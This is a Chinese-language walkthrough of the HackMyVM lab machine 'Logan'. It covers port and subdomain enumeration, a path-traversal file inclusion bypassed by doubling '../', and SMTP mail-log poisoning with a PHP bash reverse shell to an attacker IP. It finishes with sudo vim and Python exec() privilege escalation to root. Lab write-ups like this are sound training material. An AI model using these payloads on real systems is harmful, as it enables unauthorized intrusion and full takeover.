hack-my-vm-logan

端口探测

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.178.51                                     [22:14:51]
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 22:15 CST
Nmap scan report for logan.hmv (192.168.178.51)
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
25/tcp open  smtp
80/tcp open  http
MAC Address: 08:00:27:3F:E5:DD (Oracle VirtualBox virtual NIC)

深度探测一下

kali@kali [~] ➜  sudo nmap -sT -sV -sC -O -p25,80 192.168.178.51                                      [22:15:23]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 22:15 CST
Nmap scan report for logan.hmv (192.168.178.51)
Host is up (0.00053s latency).

PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=logan
| Subject Alternative Name: DNS:logan
| Not valid before: 2023-07-03T13:46:49
|_Not valid after:  2033-06-30T13:46:49
|_smtp-commands: logan.hmv, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Logan
MAC Address: 08:00:27:3F:E5:DD (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host:  logan.hmv

端口渗透

80端口先看看

kali@kali [~] ➜  curl http://192.168.178.51                                                           [22:16:03]
<meta http-equiv="refresh" content="0; url=http://logan.hmv/" />

可以看到，这个是一个跳转的命令，我们做一个hosts解析，就能访问到了

这个页面没啥价值，所以直接目录扫描

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://logan.hmv/  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://logan.hmv/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 307] [--> http://logan.hmv/images/]
/css                  (Status: 301) [Size: 304] [--> http://logan.hmv/css/]
/js                   (Status: 301) [Size: 303] [--> http://logan.hmv/js/]
/javascript           (Status: 301) [Size: 311] [--> http://logan.hmv/javascript/]
/server-status        (Status: 403) [Size: 274]
Progress: 220561 / 220562 (100.00%)
===============================================================
Finished
===============================================================

依然没有任何的价值，我们直接FUZZ子域名

kali@kali [~] ➜  wfuzz -w /home/kali/web_shell_toos/subdomains-top1million-5000.txt -u http://logan.hmv -H "Host: FUZZ.logan.hmv" --hh 65        [22:20:31]

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://logan.hmv/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                    
=====================================================================

000000024:   200        62 L     101 W      1112 Ch     "admin"                                                                                    

Total time: 0
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 0

拿到一个子域名，上去看看

有一个文件上传，传文件倒是没有啥限制，但是我们找不到文件的路径，所以感觉也没啥用，看看其它的功能点，第二个点击是404，不予考虑了，第三个好像有一个文件包含

这个file参数，感觉肯定存在包含漏洞，于此同时，目录扫描的结果也出来了

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://admin.logan.hmv/                 [22:21:21]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://admin.logan.hmv/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 323] [--> http://admin.logan.hmv/javascript/]
/payments             (Status: 301) [Size: 321] [--> http://admin.logan.hmv/payments/]
/server-status        (Status: 403) [Size: 280]
Progress: 220561 / 220562 (100.00%)
===============================================================
Finished
===============================================================

唯一有用的就是发现了这个file参数包含的路径，但是我们上传的文件并不在这个路径上

kali@kali [~] ➜  curl http://admin.logan.hmv/payments/01                                                                                         [22:23:32]
Company: Tinder
Date: 02/05/2023
Amount: 1000$

只能继续测试file参数，发现是一个../的过滤，双写就可以绕过了

但是包含啥是一个问题，这种肯定是只能包含系统文件了，我们想到了还没使用的25号端口，这个端口是用来发送邮件的，在此之前，我们先爆破一下系统文件的路径，看看那些是可以包含有回显的

结论是，无法进行web日志包含，因为apache2的默认日志路径包含是没有回显的，所以只能包含/var/log/mail.log文件，当我们使用25号端口的smtp发送邮件时，它可以记录其中一些信息，我们将这个信息改成反弹shell即可

smtp服务的使用方式如下

HELO kali.local
MAIL FROM:<sender@example.com>
RCPT TO:<www-data@logan.hmv>
DATA
Subject: Test Email

AAAAAAAAAAAAAAAAAA
.
QUIT

其中的MAIL FROM参数和RCPT TO参数均会写入到/var/log/mail.log日志里面，所以我们注入即可

kali@kali [~] ➜  telnet 192.168.178.1 25                                                                                                         [19:22:41]
Trying 192.168.178.1...
Connected to 192.168.178.1.
Escape character is '^]'.
220 logan.hmv ESMTP Postfix (Ubuntu)
HELO kali.local
250 logan.hmv
MAIL FROM:<sender@example.com>
250 2.1.0 Ok
RCPT TO:<?php exec("bash -c 'bash -i >& /dev/tcp/192.168.178.141/8888 0>&1'")?>
501 5.1.3 Bad recipient address syntax

拿到反弹shell

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [19:18:39]
listening on [any] 8888 ...
connect to [192.168.178.141] from (UNKNOWN) [192.168.178.1] 53578
bash: cannot set terminal process group (861): Inappropriate ioctl for device
bash: no job control in this shell
www-data@logan:/var/www/admin$ ls
ls
index.html
payments
payments.php
upload.php

提权

www-data@logan:/var/www/admin$ sudo -l                                                                                                                      
Matching Defaults entries for www-data on logan:                                                                                                            
    env_reset, mail_badpass,                                                                                                                                
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,                                                               
    use_pty                                                                                                                                                 
                                                                                                                                                            
User www-data may run the following commands on logan:                                                                                                      
    (logan) NOPASSWD: /usr/bin/vim 

www-data@logan:/var/www/admin$ sudo -u logan /usr/bin/vim 
!/bin/bash

logan@logan:/var/www/admin$ id
id
uid=1000(logan) gid=1000(logan) groups=1000(logan),27(sudo),1002(administration)

拿到user权限

logan@logan:/var/www/admin$ sudo -l
sudo -l
Matching Defaults entries for logan on logan:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User logan may run the following commands on logan:
    (root) NOPASSWD: /usr/bin/python3 /opt/learn_some_python.py

logan@logan:/var/www/admin$ sudo /usr/bin/python3 /opt/learn_some_python.py
sudo /usr/bin/python3 /opt/learn_some_python.py
Welcome!!!

 The first you need to now is how to use print, please type print('hello')

print('hello word')
print('hello word')
hello word

因该是可以执行一条python命令

logan@logan:/var/www/admin$ sudo /usr/bin/python3 /opt/learn_some_python.py
sudo /usr/bin/python3 /opt/learn_some_python.py
Welcome!!!

 The first you need to now is how to use print, please type print('hello')

print('hello word')
print('hello word')
hello word
logan@logan:/var/www/admin$ sudo /usr/bin/python3 /opt/learn_some_python.py
sudo /usr/bin/python3 /opt/learn_some_python.py
Welcome!!!

 The first you need to now is how to use print, please type print('hello')

import pty; pty.spawn("/bin/bash")
import pty; pty.spawn("/bin/bash")
root@logan:/var/www/admin# 

拿到root权限

确实是直接执行命令

root@logan:/home/logan# cat  /opt/learn_some_python.py
cat  /opt/learn_some_python.py
print("Welcome!!!")
comand = input("\n The first you need to now is how to use print, please type print('hello')\n\n")
exec(comand)